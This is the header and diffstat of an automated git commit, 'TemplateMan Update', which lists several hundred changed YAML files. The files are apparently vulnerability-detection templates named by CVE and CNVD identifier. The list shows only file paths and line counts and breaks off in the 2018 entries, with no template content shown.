From 523d229c92f498631f080d3b88acc7cae53e5d75 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 Nov 2023 09:19:41 +0000 Subject: [PATCH] TemplateMan Update [Mon Nov 27 09:19:41 UTC 2023] :robot: --- http/cnvd/2019/CNVD-2019-19299.yaml | 3 ++- http/cnvd/2022/CNVD-2022-03672.yaml | 3 ++- .../cloud/atechmedia-codebase-login-check.yaml | 4 ++-- .../cloud/datadog-login-check.yaml | 4 ++-- .../cloud/github-login-check.yaml | 4 ++-- .../cloud/postman-login-check.yaml | 3 ++- .../gitlab-login-check-self-hosted.yaml | 3 ++- http/cves/2001/CVE-2001-0537.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 2 +- http/cves/2004/CVE-2004-0519.yaml | 5 +++-- http/cves/2004/CVE-2004-1965.yaml | 2 +- http/cves/2005/CVE-2005-2428.yaml | 2 +- http/cves/2005/CVE-2005-3344.yaml | 2 +- http/cves/2005/CVE-2005-3634.yaml | 2 +- http/cves/2005/CVE-2005-4385.yaml | 5 +++-- http/cves/2006/CVE-2006-1681.yaml | 2 +- http/cves/2006/CVE-2006-2842.yaml | 2 +- http/cves/2007/CVE-2007-0885.yaml | 5 +++-- http/cves/2007/CVE-2007-4504.yaml | 2 +- http/cves/2007/CVE-2007-4556.yaml | 2 +- http/cves/2007/CVE-2007-5728.yaml | 2 +- http/cves/2008/CVE-2008-1059.yaml | 2 +- http/cves/2008/CVE-2008-1061.yaml | 2 +- http/cves/2008/CVE-2008-1547.yaml | 5 +++-- http/cves/2008/CVE-2008-2398.yaml | 5 +++-- http/cves/2008/CVE-2008-2650.yaml | 2 +- http/cves/2008/CVE-2008-4668.yaml | 5 +++-- http/cves/2008/CVE-2008-4764.yaml | 3 ++- http/cves/2008/CVE-2008-5587.yaml | 2 +- http/cves/2008/CVE-2008-6080.yaml | 2 +- http/cves/2008/CVE-2008-6172.yaml | 5 +++-- http/cves/2008/CVE-2008-6222.yaml | 2 +- http/cves/2008/CVE-2008-6465.yaml | 5 +++-- http/cves/2008/CVE-2008-6668.yaml | 5 +++-- http/cves/2008/CVE-2008-6982.yaml | 5 +++-- http/cves/2008/CVE-2008-7269.yaml | 5 +++-- http/cves/2009/CVE-2009-0347.yaml | 2 +- http/cves/2009/CVE-2009-0545.yaml | 2 +- http/cves/2009/CVE-2009-0932.yaml | 2 +- http/cves/2009/CVE-2009-1151.yaml | 5 +++-- http/cves/2009/CVE-2009-1496.yaml | 5 +++-- http/cves/2009/CVE-2009-1558.yaml | 2 +- http/cves/2009/CVE-2009-1872.yaml | 5 +++-- http/cves/2009/CVE-2009-2015.yaml | 2 +- http/cves/2009/CVE-2009-2100.yaml | 5 +++-- http/cves/2009/CVE-2009-3053.yaml | 5 +++-- http/cves/2009/CVE-2009-3318.yaml | 2 +- http/cves/2009/CVE-2009-4202.yaml | 5 +++-- http/cves/2009/CVE-2009-4223.yaml | 5 +++-- http/cves/2009/CVE-2009-4679.yaml | 5 +++-- http/cves/2009/CVE-2009-5020.yaml | 5 +++-- http/cves/2010/CVE-2010-0157.yaml | 5 +++-- http/cves/2010/CVE-2010-0467.yaml | 2 +- http/cves/2010/CVE-2010-0759.yaml | 5 +++-- http/cves/2010/CVE-2010-0942.yaml | 5 +++-- http/cves/2010/CVE-2010-0943.yaml | 2 +- http/cves/2010/CVE-2010-0944.yaml | 5 +++-- http/cves/2010/CVE-2010-0972.yaml | 2 +- http/cves/2010/CVE-2010-0982.yaml | 5 +++-- http/cves/2010/CVE-2010-0985.yaml | 2 +- http/cves/2010/CVE-2010-1056.yaml | 2 +- http/cves/2010/CVE-2010-1081.yaml | 2 +- http/cves/2010/CVE-2010-1217.yaml | 2 +- http/cves/2010/CVE-2010-1219.yaml | 2 +- http/cves/2010/CVE-2010-1302.yaml | 5 +++-- http/cves/2010/CVE-2010-1304.yaml | 2 +- http/cves/2010/CVE-2010-1306.yaml | 2 +- http/cves/2010/CVE-2010-1307.yaml | 2 +- http/cves/2010/CVE-2010-1308.yaml | 2 +- http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 2 +- http/cves/2010/CVE-2010-1314.yaml | 5 +++-- http/cves/2010/CVE-2010-1315.yaml | 5 +++-- http/cves/2010/CVE-2010-1340.yaml | 2 +- http/cves/2010/CVE-2010-1345.yaml | 5 +++-- http/cves/2010/CVE-2010-1352.yaml | 5 +++-- http/cves/2010/CVE-2010-1353.yaml | 2 +- http/cves/2010/CVE-2010-1354.yaml | 5 +++-- http/cves/2010/CVE-2010-1429.yaml | 2 +- http/cves/2010/CVE-2010-1461.yaml | 5 +++-- http/cves/2010/CVE-2010-1469.yaml | 2 +- http/cves/2010/CVE-2010-1470.yaml | 2 +- http/cves/2010/CVE-2010-1471.yaml | 2 +- http/cves/2010/CVE-2010-1472.yaml | 2 +- http/cves/2010/CVE-2010-1473.yaml | 5 +++-- http/cves/2010/CVE-2010-1474.yaml | 2 +- http/cves/2010/CVE-2010-1475.yaml | 2 +- http/cves/2010/CVE-2010-1476.yaml | 2 +- http/cves/2010/CVE-2010-1478.yaml | 5 +++-- http/cves/2010/CVE-2010-1491.yaml | 5 +++-- http/cves/2010/CVE-2010-1494.yaml | 5 +++-- http/cves/2010/CVE-2010-1495.yaml | 2 +- http/cves/2010/CVE-2010-1531.yaml | 5 +++-- http/cves/2010/CVE-2010-1532.yaml | 5 +++-- http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1534.yaml | 5 +++-- http/cves/2010/CVE-2010-1535.yaml | 2 +- http/cves/2010/CVE-2010-1540.yaml | 2 +- http/cves/2010/CVE-2010-1586.yaml | 5 +++-- http/cves/2010/CVE-2010-1601.yaml | 5 +++-- http/cves/2010/CVE-2010-1602.yaml | 5 +++-- http/cves/2010/CVE-2010-1603.yaml | 5 +++-- http/cves/2010/CVE-2010-1607.yaml | 5 +++-- http/cves/2010/CVE-2010-1653.yaml | 2 +- http/cves/2010/CVE-2010-1657.yaml | 2 +- http/cves/2010/CVE-2010-1658.yaml | 2 +- http/cves/2010/CVE-2010-1659.yaml | 5 +++-- http/cves/2010/CVE-2010-1714.yaml | 2 +- http/cves/2010/CVE-2010-1715.yaml | 2 +- http/cves/2010/CVE-2010-1717.yaml | 2 +- http/cves/2010/CVE-2010-1718.yaml | 5 +++-- http/cves/2010/CVE-2010-1719.yaml | 2 +- http/cves/2010/CVE-2010-1722.yaml | 2 +- http/cves/2010/CVE-2010-1723.yaml | 5 +++-- http/cves/2010/CVE-2010-1858.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 2 +- http/cves/2010/CVE-2010-1875.yaml | 2 +- http/cves/2010/CVE-2010-1878.yaml | 5 +++-- http/cves/2010/CVE-2010-1952.yaml | 2 +- http/cves/2010/CVE-2010-1953.yaml | 2 +- http/cves/2010/CVE-2010-1954.yaml | 2 +- http/cves/2010/CVE-2010-1955.yaml | 2 +- http/cves/2010/CVE-2010-1956.yaml | 2 +- http/cves/2010/CVE-2010-1957.yaml | 2 +- http/cves/2010/CVE-2010-1977.yaml | 5 +++-- http/cves/2010/CVE-2010-1979.yaml | 5 +++-- http/cves/2010/CVE-2010-1980.yaml | 2 +- http/cves/2010/CVE-2010-1981.yaml | 2 +- http/cves/2010/CVE-2010-1982.yaml | 5 +++-- http/cves/2010/CVE-2010-1983.yaml | 5 +++-- http/cves/2010/CVE-2010-2033.yaml | 5 +++-- http/cves/2010/CVE-2010-2034.yaml | 2 +- http/cves/2010/CVE-2010-2035.yaml | 2 +- http/cves/2010/CVE-2010-2036.yaml | 2 +- http/cves/2010/CVE-2010-2037.yaml | 2 +- http/cves/2010/CVE-2010-2045.yaml | 2 +- http/cves/2010/CVE-2010-2050.yaml | 2 +- http/cves/2010/CVE-2010-2122.yaml | 5 +++-- http/cves/2010/CVE-2010-2128.yaml | 2 +- http/cves/2010/CVE-2010-2259.yaml | 2 +- http/cves/2010/CVE-2010-2307.yaml | 5 +++-- http/cves/2010/CVE-2010-2507.yaml | 2 +- http/cves/2010/CVE-2010-2680.yaml | 5 +++-- http/cves/2010/CVE-2010-2682.yaml | 5 +++-- http/cves/2010/CVE-2010-2857.yaml | 5 +++-- http/cves/2010/CVE-2010-2861.yaml | 4 ++-- http/cves/2010/CVE-2010-2918.yaml | 2 +- http/cves/2010/CVE-2010-2920.yaml | 2 +- http/cves/2010/CVE-2010-3203.yaml | 5 +++-- http/cves/2010/CVE-2010-3426.yaml | 5 +++-- http/cves/2010/CVE-2010-4231.yaml | 5 +++-- http/cves/2010/CVE-2010-4239.yaml | 5 +++-- http/cves/2010/CVE-2010-4282.yaml | 5 +++-- http/cves/2010/CVE-2010-4617.yaml | 5 +++-- http/cves/2010/CVE-2010-4719.yaml | 2 +- http/cves/2010/CVE-2010-4769.yaml | 2 +- http/cves/2010/CVE-2010-4977.yaml | 5 +++-- http/cves/2010/CVE-2010-5028.yaml | 2 +- http/cves/2010/CVE-2010-5278.yaml | 2 +- http/cves/2010/CVE-2010-5286.yaml | 5 +++-- http/cves/2011/CVE-2011-0049.yaml | 2 +- http/cves/2011/CVE-2011-2744.yaml | 2 +- http/cves/2011/CVE-2011-2780.yaml | 2 +- http/cves/2011/CVE-2011-3315.yaml | 2 +- http/cves/2011/CVE-2011-4336.yaml | 5 +++-- http/cves/2011/CVE-2011-4618.yaml | 2 +- http/cves/2011/CVE-2011-4624.yaml | 2 +- http/cves/2011/CVE-2011-4804.yaml | 5 +++-- http/cves/2011/CVE-2011-4926.yaml | 2 +- http/cves/2011/CVE-2011-5106.yaml | 5 +++-- http/cves/2011/CVE-2011-5107.yaml | 5 +++-- http/cves/2011/CVE-2011-5179.yaml | 5 +++-- http/cves/2011/CVE-2011-5181.yaml | 5 +++-- http/cves/2011/CVE-2011-5252.yaml | 2 +- http/cves/2011/CVE-2011-5265.yaml | 5 +++-- http/cves/2012/CVE-2012-0392.yaml | 2 +- http/cves/2012/CVE-2012-0394.yaml | 2 +- http/cves/2012/CVE-2012-0901.yaml | 5 +++-- http/cves/2012/CVE-2012-0981.yaml | 5 +++-- http/cves/2012/CVE-2012-0991.yaml | 2 +- http/cves/2012/CVE-2012-0996.yaml | 5 +++-- http/cves/2012/CVE-2012-1226.yaml | 2 +- http/cves/2012/CVE-2012-1835.yaml | 5 +++-- http/cves/2012/CVE-2012-2371.yaml | 2 +- http/cves/2012/CVE-2012-3153.yaml | 6 +++--- http/cves/2012/CVE-2012-4032.yaml | 2 +- http/cves/2012/CVE-2012-4242.yaml | 5 +++-- http/cves/2012/CVE-2012-4253.yaml | 2 +- http/cves/2012/CVE-2012-4273.yaml | 5 +++-- http/cves/2012/CVE-2012-4547.yaml | 5 +++-- http/cves/2012/CVE-2012-4768.yaml | 5 +++-- http/cves/2012/CVE-2012-4878.yaml | 2 +- http/cves/2012/CVE-2012-4889.yaml | 2 +- http/cves/2012/CVE-2012-4940.yaml | 7 ++++--- http/cves/2012/CVE-2012-4982.yaml | 5 +++-- http/cves/2012/CVE-2012-5913.yaml | 2 +- http/cves/2012/CVE-2012-6499.yaml | 2 +- http/cves/2013/CVE-2013-1965.yaml | 2 +- http/cves/2013/CVE-2013-2248.yaml | 2 +- http/cves/2013/CVE-2013-2287.yaml | 5 +++-- http/cves/2013/CVE-2013-2621.yaml | 2 +- http/cves/2013/CVE-2013-3526.yaml | 5 +++-- http/cves/2013/CVE-2013-3827.yaml | 2 +- http/cves/2013/CVE-2013-4117.yaml | 5 +++-- http/cves/2013/CVE-2013-4625.yaml | 5 +++-- http/cves/2013/CVE-2013-5528.yaml | 5 +++-- http/cves/2013/CVE-2013-5979.yaml | 2 +- http/cves/2013/CVE-2013-6281.yaml | 5 +++-- http/cves/2013/CVE-2013-7240.yaml | 2 +- http/cves/2013/CVE-2013-7285.yaml | 2 +- http/cves/2014/CVE-2014-10037.yaml | 5 +++-- http/cves/2014/CVE-2014-1203.yaml | 2 +- http/cves/2014/CVE-2014-2383.yaml | 5 +++-- http/cves/2014/CVE-2014-2908.yaml | 2 +- http/cves/2014/CVE-2014-2962.yaml | 2 +- http/cves/2014/CVE-2014-3120.yaml | 2 +- http/cves/2014/CVE-2014-3206.yaml | 2 +- http/cves/2014/CVE-2014-3744.yaml | 2 +- http/cves/2014/CVE-2014-4210.yaml | 5 +++-- http/cves/2014/CVE-2014-4513.yaml | 5 +++-- http/cves/2014/CVE-2014-4535.yaml | 5 +++-- http/cves/2014/CVE-2014-4536.yaml | 5 +++-- http/cves/2014/CVE-2014-4539.yaml | 5 +++-- http/cves/2014/CVE-2014-4544.yaml | 5 +++-- http/cves/2014/CVE-2014-4550.yaml | 5 +++-- http/cves/2014/CVE-2014-4558.yaml | 5 +++-- http/cves/2014/CVE-2014-4561.yaml | 5 +++-- http/cves/2014/CVE-2014-4592.yaml | 5 +++-- http/cves/2014/CVE-2014-4942.yaml | 2 +- http/cves/2014/CVE-2014-5111.yaml | 2 +- http/cves/2014/CVE-2014-5258.yaml | 5 +++-- http/cves/2014/CVE-2014-5368.yaml | 2 +- http/cves/2014/CVE-2014-6287.yaml | 2 +- http/cves/2014/CVE-2014-6308.yaml | 2 +- http/cves/2014/CVE-2014-8676.yaml | 5 +++-- http/cves/2014/CVE-2014-8682.yaml | 2 +- http/cves/2014/CVE-2014-8799.yaml | 2 +- http/cves/2014/CVE-2014-9094.yaml | 2 +- http/cves/2014/CVE-2014-9119.yaml | 2 +- http/cves/2014/CVE-2014-9180.yaml | 5 +++-- http/cves/2014/CVE-2014-9444.yaml | 5 +++-- http/cves/2014/CVE-2014-9606.yaml | 5 +++-- http/cves/2014/CVE-2014-9607.yaml | 5 +++-- http/cves/2014/CVE-2014-9608.yaml | 5 +++-- http/cves/2014/CVE-2014-9609.yaml | 5 +++-- http/cves/2014/CVE-2014-9614.yaml | 2 +- http/cves/2014/CVE-2014-9615.yaml | 5 +++-- http/cves/2014/CVE-2014-9617.yaml | 5 +++-- http/cves/2014/CVE-2014-9618.yaml | 5 +++-- http/cves/2015/CVE-2015-0554.yaml | 5 +++-- http/cves/2015/CVE-2015-1000005.yaml | 2 +- http/cves/2015/CVE-2015-1000010.yaml | 2 +- http/cves/2015/CVE-2015-1000012.yaml | 5 +++-- http/cves/2015/CVE-2015-1427.yaml | 2 +- http/cves/2015/CVE-2015-1503.yaml | 2 +- http/cves/2015/CVE-2015-1579.yaml | 2 +- http/cves/2015/CVE-2015-1880.yaml | 5 +++-- http/cves/2015/CVE-2015-2067.yaml | 2 +- http/cves/2015/CVE-2015-2068.yaml | 5 +++-- http/cves/2015/CVE-2015-2080.yaml | 2 +- http/cves/2015/CVE-2015-2166.yaml | 2 +- http/cves/2015/CVE-2015-2196.yaml | 5 +++-- http/cves/2015/CVE-2015-2755.yaml | 5 +++-- http/cves/2015/CVE-2015-2807.yaml | 5 +++-- http/cves/2015/CVE-2015-2863.yaml | 5 +++-- http/cves/2015/CVE-2015-2996.yaml | 5 +++-- http/cves/2015/CVE-2015-3224.yaml | 2 +- http/cves/2015/CVE-2015-3337.yaml | 4 ++-- http/cves/2015/CVE-2015-3648.yaml | 5 +++-- http/cves/2015/CVE-2015-3897.yaml | 5 +++-- http/cves/2015/CVE-2015-4050.yaml | 5 +++-- http/cves/2015/CVE-2015-4062.yaml | 5 +++-- http/cves/2015/CVE-2015-4063.yaml | 5 +++-- http/cves/2015/CVE-2015-4074.yaml | 5 +++-- http/cves/2015/CVE-2015-4127.yaml | 5 +++-- http/cves/2015/CVE-2015-4414.yaml | 2 +- http/cves/2015/CVE-2015-4632.yaml | 2 +- http/cves/2015/CVE-2015-4666.yaml | 2 +- http/cves/2015/CVE-2015-4668.yaml | 5 +++-- http/cves/2015/CVE-2015-4694.yaml | 2 +- http/cves/2015/CVE-2015-5354.yaml | 5 +++-- http/cves/2015/CVE-2015-5461.yaml | 5 +++-- http/cves/2015/CVE-2015-5469.yaml | 5 +++-- http/cves/2015/CVE-2015-5471.yaml | 2 +- http/cves/2015/CVE-2015-5531.yaml | 2 +- http/cves/2015/CVE-2015-5688.yaml | 5 +++-- http/cves/2015/CVE-2015-6477.yaml | 5 +++-- http/cves/2015/CVE-2015-6544.yaml | 5 +++-- http/cves/2015/CVE-2015-6920.yaml | 5 +++-- http/cves/2015/CVE-2015-7245.yaml | 2 +- http/cves/2015/CVE-2015-7377.yaml | 5 +++-- http/cves/2015/CVE-2015-7450.yaml | 2 +- http/cves/2015/CVE-2015-7780.yaml | 5 +++-- http/cves/2015/CVE-2015-7823.yaml | 5 +++-- http/cves/2015/CVE-2015-8349.yaml | 5 +++-- http/cves/2015/CVE-2015-8813.yaml | 5 +++-- http/cves/2015/CVE-2015-9312.yaml | 5 +++-- http/cves/2015/CVE-2015-9323.yaml | 5 +++-- http/cves/2015/CVE-2015-9414.yaml | 5 +++-- http/cves/2015/CVE-2015-9480.yaml | 2 +- http/cves/2016/CVE-2016-0957.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 5 +++-- http/cves/2016/CVE-2016-1000127.yaml | 5 +++-- http/cves/2016/CVE-2016-1000128.yaml | 5 +++-- http/cves/2016/CVE-2016-1000129.yaml | 5 +++-- http/cves/2016/CVE-2016-1000130.yaml | 5 +++-- http/cves/2016/CVE-2016-1000131.yaml | 5 +++-- http/cves/2016/CVE-2016-1000132.yaml | 5 +++-- http/cves/2016/CVE-2016-1000133.yaml | 5 +++-- http/cves/2016/CVE-2016-1000134.yaml | 5 +++-- http/cves/2016/CVE-2016-1000135.yaml | 5 +++-- http/cves/2016/CVE-2016-1000136.yaml | 5 +++-- http/cves/2016/CVE-2016-1000137.yaml | 5 +++-- http/cves/2016/CVE-2016-1000138.yaml | 5 +++-- http/cves/2016/CVE-2016-1000139.yaml | 5 +++-- http/cves/2016/CVE-2016-1000140.yaml | 5 +++-- http/cves/2016/CVE-2016-1000141.yaml | 5 +++-- http/cves/2016/CVE-2016-1000142.yaml | 5 +++-- http/cves/2016/CVE-2016-1000143.yaml | 5 +++-- http/cves/2016/CVE-2016-1000146.yaml | 5 +++-- http/cves/2016/CVE-2016-1000148.yaml | 5 +++-- http/cves/2016/CVE-2016-1000149.yaml | 5 +++-- http/cves/2016/CVE-2016-1000152.yaml | 5 +++-- http/cves/2016/CVE-2016-1000153.yaml | 5 +++-- http/cves/2016/CVE-2016-1000154.yaml | 5 +++-- http/cves/2016/CVE-2016-1000155.yaml | 5 +++-- http/cves/2016/CVE-2016-10033.yaml | 2 +- http/cves/2016/CVE-2016-10108.yaml | 2 +- http/cves/2016/CVE-2016-10134.yaml | 2 +- http/cves/2016/CVE-2016-10367.yaml | 2 +- http/cves/2016/CVE-2016-10368.yaml | 5 +++-- http/cves/2016/CVE-2016-10924.yaml | 5 +++-- http/cves/2016/CVE-2016-10940.yaml | 5 +++-- http/cves/2016/CVE-2016-10956.yaml | 2 +- http/cves/2016/CVE-2016-10960.yaml | 2 +- http/cves/2016/CVE-2016-10973.yaml | 5 +++-- http/cves/2016/CVE-2016-10993.yaml | 5 +++-- http/cves/2016/CVE-2016-1555.yaml | 4 ++-- http/cves/2016/CVE-2016-2389.yaml | 2 +- http/cves/2016/CVE-2016-3088.yaml | 5 +++-- http/cves/2016/CVE-2016-3978.yaml | 5 +++-- http/cves/2016/CVE-2016-4975.yaml | 5 +++-- http/cves/2016/CVE-2016-4977.yaml | 2 +- http/cves/2016/CVE-2016-5649.yaml | 4 ++-- http/cves/2016/CVE-2016-6195.yaml | 5 +++-- http/cves/2016/CVE-2016-7552.yaml | 2 +- http/cves/2016/CVE-2016-7834.yaml | 5 +++-- http/cves/2016/CVE-2016-7981.yaml | 5 +++-- http/cves/2016/CVE-2016-8527.yaml | 5 +++-- http/cves/2017/CVE-2017-0929.yaml | 5 +++-- http/cves/2017/CVE-2017-1000029.yaml | 5 +++-- http/cves/2017/CVE-2017-1000163.yaml | 5 +++-- http/cves/2017/CVE-2017-1000170.yaml | 2 +- http/cves/2017/CVE-2017-1000486.yaml | 2 +- http/cves/2017/CVE-2017-10075.yaml | 2 +- http/cves/2017/CVE-2017-10974.yaml | 5 +++-- http/cves/2017/CVE-2017-11165.yaml | 2 +- http/cves/2017/CVE-2017-11444.yaml | 2 +- http/cves/2017/CVE-2017-11586.yaml | 5 +++-- http/cves/2017/CVE-2017-11610.yaml | 2 +- http/cves/2017/CVE-2017-11629.yaml | 5 +++-- http/cves/2017/CVE-2017-12138.yaml | 5 +++-- http/cves/2017/CVE-2017-12542.yaml | 2 +- http/cves/2017/CVE-2017-12544.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 5 +++-- http/cves/2017/CVE-2017-12615.yaml | 2 +- http/cves/2017/CVE-2017-12637.yaml | 5 +++-- http/cves/2017/CVE-2017-12794.yaml | 5 +++-- http/cves/2017/CVE-2017-14135.yaml | 2 +- http/cves/2017/CVE-2017-14524.yaml | 5 +++-- http/cves/2017/CVE-2017-14535.yaml | 5 +++-- http/cves/2017/CVE-2017-14537.yaml | 5 +++-- http/cves/2017/CVE-2017-14622.yaml | 5 +++-- http/cves/2017/CVE-2017-14651.yaml | 5 +++-- http/cves/2017/CVE-2017-14849.yaml | 2 +- http/cves/2017/CVE-2017-15287.yaml | 5 +++-- http/cves/2017/CVE-2017-15363.yaml | 2 +- http/cves/2017/CVE-2017-15647.yaml | 5 +++-- http/cves/2017/CVE-2017-15715.yaml | 5 +++-- http/cves/2017/CVE-2017-15944.yaml | 2 +- http/cves/2017/CVE-2017-16806.yaml | 2 +- http/cves/2017/CVE-2017-16877.yaml | 5 +++-- http/cves/2017/CVE-2017-16894.yaml | 5 +++-- http/cves/2017/CVE-2017-17043.yaml | 5 +++-- http/cves/2017/CVE-2017-17059.yaml | 5 +++-- http/cves/2017/CVE-2017-17451.yaml | 5 +++-- http/cves/2017/CVE-2017-17731.yaml | 2 +- http/cves/2017/CVE-2017-17736.yaml | 2 +- http/cves/2017/CVE-2017-18024.yaml | 5 +++-- http/cves/2017/CVE-2017-18487.yaml | 5 +++-- http/cves/2017/CVE-2017-18490.yaml | 5 +++-- http/cves/2017/CVE-2017-18491.yaml | 5 +++-- http/cves/2017/CVE-2017-18492.yaml | 5 +++-- http/cves/2017/CVE-2017-18493.yaml | 5 +++-- http/cves/2017/CVE-2017-18494.yaml | 5 +++-- http/cves/2017/CVE-2017-18496.yaml | 5 +++-- http/cves/2017/CVE-2017-18500.yaml | 5 +++-- http/cves/2017/CVE-2017-18501.yaml | 5 +++-- http/cves/2017/CVE-2017-18502.yaml | 5 +++-- http/cves/2017/CVE-2017-18505.yaml | 5 +++-- http/cves/2017/CVE-2017-18516.yaml | 5 +++-- http/cves/2017/CVE-2017-18517.yaml | 5 +++-- http/cves/2017/CVE-2017-18518.yaml | 5 +++-- http/cves/2017/CVE-2017-18527.yaml | 5 +++-- http/cves/2017/CVE-2017-18528.yaml | 5 +++-- http/cves/2017/CVE-2017-18529.yaml | 5 +++-- http/cves/2017/CVE-2017-18530.yaml | 5 +++-- http/cves/2017/CVE-2017-18532.yaml | 5 +++-- http/cves/2017/CVE-2017-18536.yaml | 5 +++-- http/cves/2017/CVE-2017-18537.yaml | 5 +++-- http/cves/2017/CVE-2017-18542.yaml | 5 +++-- http/cves/2017/CVE-2017-18556.yaml | 5 +++-- http/cves/2017/CVE-2017-18557.yaml | 5 +++-- http/cves/2017/CVE-2017-18558.yaml | 5 +++-- http/cves/2017/CVE-2017-18562.yaml | 5 +++-- http/cves/2017/CVE-2017-18564.yaml | 5 +++-- http/cves/2017/CVE-2017-18565.yaml | 5 +++-- http/cves/2017/CVE-2017-18566.yaml | 5 +++-- http/cves/2017/CVE-2017-18598.yaml | 5 +++-- http/cves/2017/CVE-2017-18638.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 4 ++-- http/cves/2017/CVE-2017-3528.yaml | 5 +++-- http/cves/2017/CVE-2017-4011.yaml | 5 +++-- http/cves/2017/CVE-2017-5631.yaml | 5 +++-- http/cves/2017/CVE-2017-5638.yaml | 2 +- http/cves/2017/CVE-2017-5689.yaml | 5 +++-- http/cves/2017/CVE-2017-5982.yaml | 2 +- http/cves/2017/CVE-2017-6090.yaml | 2 +- http/cves/2017/CVE-2017-7391.yaml | 5 +++-- http/cves/2017/CVE-2017-7615.yaml | 2 +- http/cves/2017/CVE-2017-7855.yaml | 11 +++++++---- http/cves/2017/CVE-2017-7921.yaml | 2 +- http/cves/2017/CVE-2017-7925.yaml | 2 +- http/cves/2017/CVE-2017-8229.yaml | 2 +- http/cves/2017/CVE-2017-9140.yaml | 5 +++-- http/cves/2017/CVE-2017-9288.yaml | 5 +++-- http/cves/2017/CVE-2017-9416.yaml | 2 +- http/cves/2017/CVE-2017-9506.yaml | 2 +- http/cves/2017/CVE-2017-9822.yaml | 2 +- http/cves/2017/CVE-2017-9833.yaml | 5 +++-- http/cves/2018/CVE-2018-0127.yaml | 4 ++-- http/cves/2018/CVE-2018-0296.yaml | 2 +- http/cves/2018/CVE-2018-1000129.yaml | 5 +++-- http/cves/2018/CVE-2018-1000130.yaml | 2 +- http/cves/2018/CVE-2018-1000226.yaml | 2 +- http/cves/2018/CVE-2018-1000533.yaml | 2 +- http/cves/2018/CVE-2018-1000671.yaml | 5 +++-- http/cves/2018/CVE-2018-1000856.yaml | 5 +++-- http/cves/2018/CVE-2018-10093.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 5 +++-- http/cves/2018/CVE-2018-10201.yaml | 2 +- http/cves/2018/CVE-2018-10230.yaml | 5 +++-- http/cves/2018/CVE-2018-10822.yaml | 2 +- http/cves/2018/CVE-2018-10823.yaml | 2 +- http/cves/2018/CVE-2018-10956.yaml | 2 +- http/cves/2018/CVE-2018-11227.yaml | 2 +- http/cves/2018/CVE-2018-11231.yaml | 5 +++-- http/cves/2018/CVE-2018-11473.yaml | 6 +++--- http/cves/2018/CVE-2018-11709.yaml | 5 +++-- http/cves/2018/CVE-2018-11759.yaml | 2 +- http/cves/2018/CVE-2018-11784.yaml | 2 +- http/cves/2018/CVE-2018-12031.yaml | 5 +++-- http/cves/2018/CVE-2018-1207.yaml | 2 +- http/cves/2018/CVE-2018-12095.yaml | 5 +++-- http/cves/2018/CVE-2018-12296.yaml | 5 +++-- http/cves/2018/CVE-2018-12300.yaml | 5 +++-- http/cves/2018/CVE-2018-12675.yaml | 5 +++-- http/cves/2018/CVE-2018-1271.yaml | 5 +++-- http/cves/2018/CVE-2018-12909.yaml | 2 +- http/cves/2018/CVE-2018-12998.yaml | 2 +- http/cves/2018/CVE-2018-1335.yaml | 2 +- http/cves/2018/CVE-2018-13379.yaml | 5 +++-- http/cves/2018/CVE-2018-13380.yaml | 5 +++-- http/cves/2018/CVE-2018-13980.yaml | 5 +++-- http/cves/2018/CVE-2018-14013.yaml | 5 +++-- http/cves/2018/CVE-2018-14064.yaml | 2 +- http/cves/2018/CVE-2018-14474.yaml | 5 +++-- http/cves/2018/CVE-2018-14574.yaml | 5 +++-- http/cves/2018/CVE-2018-14912.yaml | 5 +++-- http/cves/2018/CVE-2018-14916.yaml | 5 +++-- http/cves/2018/CVE-2018-14918.yaml | 2 +- http/cves/2018/CVE-2018-14931.yaml | 5 +++-- http/cves/2018/CVE-2018-15138.yaml | 2 +- http/cves/2018/CVE-2018-15517.yaml | 5 +++-- http/cves/2018/CVE-2018-15535.yaml | 2 +- http/cves/2018/CVE-2018-15917.yaml | 6 +++--- http/cves/2018/CVE-2018-16133.yaml | 2 +- http/cves/2018/CVE-2018-16139.yaml | 5 +++-- http/cves/2018/CVE-2018-16159.yaml | 5 +++-- http/cves/2018/CVE-2018-16167.yaml | 2 +- http/cves/2018/CVE-2018-16283.yaml | 2 +- http/cves/2018/CVE-2018-16288.yaml | 2 +- http/cves/2018/CVE-2018-16299.yaml | 5 +++-- http/cves/2018/CVE-2018-16668.yaml | 5 +++-- http/cves/2018/CVE-2018-16670.yaml | 5 +++-- http/cves/2018/CVE-2018-16671.yaml | 5 +++-- http/cves/2018/CVE-2018-16716.yaml | 5 +++-- http/cves/2018/CVE-2018-16761.yaml | 5 +++-- http/cves/2018/CVE-2018-16763.yaml | 2 +- http/cves/2018/CVE-2018-16979.yaml | 5 +++-- http/cves/2018/CVE-2018-17153.yaml | 2 +- http/cves/2018/CVE-2018-17246.yaml | 2 +- http/cves/2018/CVE-2018-17254.yaml | 2 +- http/cves/2018/CVE-2018-17422.yaml | 5 +++-- http/cves/2018/CVE-2018-17431.yaml | 2 +- http/cves/2018/CVE-2018-18069.yaml | 5 +++-- http/cves/2018/CVE-2018-18264.yaml | 4 ++-- http/cves/2018/CVE-2018-18323.yaml | 2 +- http/cves/2018/CVE-2018-18570.yaml | 5 +++-- http/cves/2018/CVE-2018-18608.yaml | 5 +++-- http/cves/2018/CVE-2018-18775.yaml | 5 +++-- http/cves/2018/CVE-2018-18777.yaml | 5 +++-- http/cves/2018/CVE-2018-18778.yaml | 5 +++-- http/cves/2018/CVE-2018-18809.yaml | 2 +- http/cves/2018/CVE-2018-18925.yaml | 5 +++-- http/cves/2018/CVE-2018-19137.yaml | 6 +++--- http/cves/2018/CVE-2018-19287.yaml | 6 +++--- http/cves/2018/CVE-2018-19326.yaml | 5 +++-- http/cves/2018/CVE-2018-19365.yaml | 2 +- http/cves/2018/CVE-2018-19386.yaml | 5 +++-- http/cves/2018/CVE-2018-19439.yaml | 5 +++-- http/cves/2018/CVE-2018-19458.yaml | 5 +++-- http/cves/2018/CVE-2018-19749.yaml | 5 +++-- http/cves/2018/CVE-2018-19751.yaml | 5 +++-- http/cves/2018/CVE-2018-19752.yaml | 5 +++-- http/cves/2018/CVE-2018-19753.yaml | 5 +++-- 